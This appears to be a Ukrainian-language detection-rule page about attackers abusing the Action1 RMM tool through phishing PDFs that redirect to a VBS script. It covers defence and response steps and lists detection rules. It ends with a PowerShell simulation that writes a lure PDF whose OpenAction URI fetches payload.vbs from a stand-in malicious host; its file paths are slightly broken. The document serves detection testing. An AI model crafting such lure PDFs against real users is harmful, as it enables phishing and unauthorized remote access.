Зловживання інструментами RMM продовжує зростати у активних загрозах
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники використовують інструменти віддаленого управління та моніторингу (RMM), зокрема Action1, для встановлення стійкого доступу в скомпрометованих середовищах. Атака починається з фішингового електронного листа, що містить шкідливий PDF, який перенаправляє жертв на файл VBS. Сценарій потім завантажує та встановлює пакет MSI, що містить легітимного агента Action1, що дозволяє несанкціонований віддалений доступ.
Розслідування
Розслідування виявило шкідливий PDF, який використовує ключові слова OpenAction та URI для ініціювання завантаження з URL, розміщеного на Vercel. Аналіз отриманого пакета MSI виявив, що легітимні файли компанії Action1 використовуються зловмисно через хмарну інфраструктуру самого постачальника. Встановлений агент містить специфічний CustomerID та спілкується з легітимним доменом Action1.
Міри захисту
Організації повинні налаштувати фільтрацію електронної пошти для виявлення підозрілих структур PDF, що містять ключові слова OpenAction або URI. Команди безпеки повинні стежити за несанкціонованими інсталяціями RMM-інструментів та створенням служби A1Agent. Блокування з’єднань з несподіваною хмарною інфраструктурою RMM та виявлення незвичних або несанкціонованих CustomerID може додатково знизити ризик зловживання віддаленим доступом.
Відповідь
Коли виявлено шкідливу активність RMM, ізолюйте уражений хост, щоб запобігти додатковому виконанню віддалених команд. Розслідуйте фішинговий електронний лист та проведіть судову експертизу пов’язаних файлів VBS та MSI. Відкликайте потенційно скомпрометовані облікові дані та перегляньте конфігурації агентів Action1 на предмет індикаторів несанкціонованого віддаленого доступу або стійкості.
Хід атаки
Ми ще оновлюємо цю частину.
Виявлення
LOLBAS WScript / CScript (через process_creation)
Альтернативне програмне забезпечення для віддаленого доступу / управління (через process_creation)
Можлива крадіжка/експіляція даних / C2 через сторонні сервіси / інструменти (через проксі)
Можлива крадіжка/експіляція даних / C2 через сторонні сервіси / інструменти (через dns)
Можлива активність управління та контролю через спробу комунікації з доменом програмного забезпечення для віддаленого доступу (через dns)
IOC (HashSha256) для виявлення: Інші інструменти RMM у дикій природі
Віддалене підключення до корпоративних серверів Action1 [Підключення до мережі Windows]
PDF OpenAction та URI перенаправлення до шкідливого VBS [Подія файлу Windows]
Виконання симуляції
-
Сценарій атаки та команди: Противник імітує фішингову кампанію. Мета полягає в тому, щоб доставити файл з назвою
Квитанція про транзакцію .pdfжертві. PDF спеціально розроблений так, щоб як тільки користувач відкриє його,/OpenActionкоманда запускає/URIперенаправлення. Це перенаправлення призначено для перенесення користувача на сайт, що служить шкідливим VBScript. Щоб запустити зазначене правило виявлення, ми створимо файл з точною назвою та внутрішніми рядками, необхiдними. -
Скрипт тестування регресії:
# Скрипт симуляції: Активізація виявлення PDF OpenAction $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" # Створення "шкідливого" вмісту PDF для відповідності ключовим словам виявлення $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Запис файлу на диск для запуску виявлення 'file_event' $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "Файл для симуляції створено в: $targetFile" Write-Host "Перевірте вашу SIEM на отримання сповіщення про виявлення." -
Команди очищення:
# Очищення: Видалення симульованого шкідливого файлу $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Очистка завершена: $targetFile видалено." } else { Write-Host "Очистка: Файл не знайдено."